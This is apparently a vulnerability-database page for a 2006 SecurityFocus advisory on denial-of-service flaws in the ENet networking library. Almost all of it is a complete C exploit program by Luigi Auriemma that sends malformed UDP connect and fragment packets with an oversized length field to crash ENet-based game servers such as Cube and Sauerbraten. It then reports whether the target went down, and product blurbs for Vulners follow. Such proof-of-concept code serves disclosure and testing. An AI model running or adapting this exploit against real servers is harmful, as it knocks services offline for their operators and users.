source: http://www.securityfocus.com/bid/17087/info
ENet is prone to multiple denial-of-service vulnerabilities. A remote attacker can send specifically crafted data to trigger these flaws, leading to a denial-of-service condition.
/*
by Luigi Auriemma
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <time.h>
#include "enet_protocol.h"
#ifdef WIN32
#include <winsock.h>
#include "winerr.h"
#define close closesocket
#define ONESEC 1000
#define MYRAND clock()
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>
#include <sys/times.h>
#define ONESEC 1
#define MYRAND times(0)
#define strnicmp strncasecmp
#endif
#define VER "0.1"
u_int get_num(u_char *str);
int send_recv(int sd, u_char *in, int insz, u_char *out, int outsz, int err);
int timeout(int sock);
u_int resolv(char *host);
void std_err(void);
struct sockaddr_in peer;
u_int commandLength = 0xffff0000;
int main(int argc, char *argv[]) {
ENetProtocolHeader *header;
ENetProtocol *command;
u_int chall,
stime;
int sd,
len,
attack;
u_char buff[8192];
#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif
setbuf(stdout, NULL);
fputs("\n"
"ENet library <= Jul 2005 multiple vulnerabilities "VER"\n"
"by Luigi Auriemma\n"
"e-mail: [email protected]\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);
if(argc < 3) {
printf("\n"
"Usage: %s <attack> <host> <port> [commandLength(0x%08x)]\n"
"\n"
"Attack:\n"
" 1 = invalid memory access\n"
" 2 = allocation abort with fragment\n"
"\n"
" Default port examples: Cube on 28765, Sauerbraten on 28785\n"
" commandLength is the big value to use for both the attacks, read my advisory\n"
"\n", argv[0], commandLength);
exit(1);
}
header = (ENetProtocolHeader *)buff;
command = (ENetProtocol *)(buff + sizeof(ENetProtocolHeader));
attack = atoi(argv[1]);
if(argc > 4) commandLength = get_num(argv[4]);
peer.sin_addr.s_addr = resolv(argv[2]);
peer.sin_port = htons(atoi(argv[3]));
peer.sin_family = AF_INET;
printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr),
ntohs(peer.sin_port));
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
stime = MYRAND;
chall = ~stime;
if(attack == 1) {
printf("- send malformed packet\n");
header->peerID = htons(0xffff);
header->flags = 0;
header->commandCount = 1 + (MYRAND % 255); // major than 1
header->sentTime = stime;
header->challenge = chall;
command->header.command = ENET_PROTOCOL_COMMAND_CONNECT;
command->header.channelID = 0xff;
command->header.flags = ENET_PROTOCOL_FLAG_ACKNOWLEDGE;
command->header.reserved = 0;
command->header.commandLength = htonl(commandLength); // BOOM
command->header.reliableSequenceNumber = htonl(1);
command->connect.outgoingPeerID = htons(0);
command->connect.mtu = htons(1400);
command->connect.windowSize = htonl(32768);
command->connect.channelCount = htonl(ENET_PROTOCOL_MINIMUM_CHANNEL_COUNT);
command->connect.incomingBandwidth = htonl(0);
command->connect.outgoingBandwidth = htonl(0);
command->connect.packetThrottleInterval = htonl(5000);
command->connect.packetThrottleAcceleration = htonl(2);
command->connect.packetThrottleDeceleration = htonl(2);
len = send_recv(sd,
buff, sizeof(ENetProtocolCommandHeader) + sizeof(ENetProtocolConnect),
buff, sizeof(buff), 0);
if(len < 0) {
printf("- no reply from the server, it should be already crashed\n");
}
} else if(attack == 2) {
printf("- start connection to host\n");
printf(" send connect\n");
header->peerID = htons(0xffff);
header->flags = 0;
header->commandCount = 1;
header->sentTime = stime;
header->challenge = chall;
command->header.command = ENET_PROTOCOL_COMMAND_CONNECT;
command->header.channelID = 0xff;
command->header.flags = ENET_PROTOCOL_FLAG_ACKNOWLEDGE;
command->header.reserved = 0;
command->header.commandLength = htonl(sizeof(ENetProtocolConnect));
command->header.reliableSequenceNumber = htonl(1);
command->connect.outgoingPeerID = htons(0);
command->connect.mtu = htons(1400);
command->connect.windowSize = htonl(32768);
command->connect.channelCount = htonl(2);
command->connect.incomingBandwidth = htonl(0);
command->connect.outgoingBandwidth = htonl(0);
command->connect.packetThrottleInterval = htonl(5000);
command->connect.packetThrottleAcceleration = htonl(2);
command->connect.packetThrottleDeceleration = htonl(2);
len = send_recv(sd,
buff, sizeof(ENetProtocolCommandHeader) + ntohl(command->header.commandLength),
buff, sizeof(buff), 1);
printf(" send ack\n");
/* SRV header->peerID */
header->flags = 0;
header->commandCount = 1;
stime = ntohl(header->sentTime); // useless???
header->sentTime = htonl(stime + 1);
/* SRV header->challenge */
command->header.command = ENET_PROTOCOL_COMMAND_ACKNOWLEDGE;
/* SRV command->header.channelID */
command->header.flags = 0;
command->header.reserved = 0;
command->header.commandLength = htonl(sizeof(ENetProtocolAcknowledge));
command->header.reliableSequenceNumber = htonl(1);
/* SRV command->acknowledge.receivedReliableSequenceNumber */
command->acknowledge.receivedSentTime = htonl(stime);
len = send_recv(sd,
buff, sizeof(ENetProtocolCommandHeader) + ntohl(command->header.commandLength),
buff, sizeof(buff), 1);
printf(" send malformed fragment\n");
len = 10 + (MYRAND % 1000);
/* SRV header->peerID */
header->flags = 0;
header->commandCount = 1;
header->sentTime = htonl(ntohl(header->sentTime) + 1);
/* SRV header->challenge */
command->header.command = ENET_PROTOCOL_COMMAND_SEND_FRAGMENT;
command->header.channelID = 0;
command->header.flags = ENET_PROTOCOL_FLAG_ACKNOWLEDGE;
command->header.reserved = 0;
command->header.commandLength = htonl(sizeof(ENetProtocolSendFragment) + len);
command->header.reliableSequenceNumber = htonl(1);
command->sendFragment.startSequenceNumber = htonl(1);
command->sendFragment.fragmentCount = htonl(2 + (MYRAND % 2000));
command->sendFragment.fragmentNumber = htonl(0);
command->sendFragment.totalLength = htonl(commandLength);
command->sendFragment.fragmentOffset = htonl(0);
memset(command + sizeof(ENetProtocolSendFragment), len, len); // first len is for random
len = send_recv(sd,
buff, sizeof(ENetProtocolCommandHeader) + ntohl(command->header.commandLength),
buff, sizeof(buff), 0);
if(len < 0) {
printf("- no reply from the server, it should be already crashed\n");
}
}
close(sd);
printf("- check server:\n");
sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();
stime = MYRAND;
chall = ~stime;
header->peerID = htons(0xffff);
header->flags = 0;
header->commandCount = 1;
header->sentTime = stime;
header->challenge = chall;
command->header.command = ENET_PROTOCOL_COMMAND_CONNECT;
command->header.channelID = 0xff;
command->header.flags = ENET_PROTOCOL_FLAG_ACKNOWLEDGE;
command->header.reserved = 0;
command->header.commandLength = htonl(sizeof(ENetProtocolConnect));
command->header.reliableSequenceNumber = htonl(1);
command->connect.outgoingPeerID = htons(0);
command->connect.mtu = htons(1400);
command->connect.windowSize = htonl(32768);
command->connect.channelCount = htonl(ENET_PROTOCOL_MINIMUM_CHANNEL_COUNT);
command->connect.incomingBandwidth = htonl(0);
command->connect.outgoingBandwidth = htonl(0);
command->connect.packetThrottleInterval = htonl(5000);
command->connect.packetThrottleAcceleration = htonl(2);
command->connect.packetThrottleDeceleration = htonl(2);
len = send_recv(sd,
buff, sizeof(ENetProtocolCommandHeader) + ntohl(command->header.commandLength),
buff, sizeof(buff), 0);
if(len < 0) {
printf("\n Server IS vulnerable!!!\n\n");
} else {
printf("\n Server does not seem vulnerable\n\n");
}
close(sd);
return(0);
}
u_int get_num(u_char *str) {
u_int offset;
if(!strnicmp(str, "0x", 2)) {
sscanf(str + 2, "%x", &offset);
} else {
sscanf(str, "%u", &offset);
}
return(offset);
}
int send_recv(int sd, u_char *in, int insz, u_char *out, int outsz, int err) {
int retry,
len;
for(retry = 3; retry; retry--) {
if(sendto(sd, in, insz, 0, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
if(!timeout(sd)) break;
}
if(!retry) {
if(!err) return(-1);
fputs("\nError: socket timeout, no reply received\n\n", stdout);
exit(1);
}
len = recvfrom(sd, out, outsz, 0, NULL, NULL);
if(len < 0) std_err();
return(len);
}
int timeout(int sock) {
struct timeval tout;
fd_set fd_read;
int err;
tout.tv_sec = 2;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
err = select(sock + 1, &fd_read, NULL, NULL, &tout);
if(err < 0) std_err();
if(!err) return(-1);
return(0);
}
u_int resolv(char *host) {
struct hostent *hp;
u_int host_ip;
host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n", host);
exit(1);
} else host_ip = *(u_int *)hp->h_addr;
}
return(host_ip);
}
#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation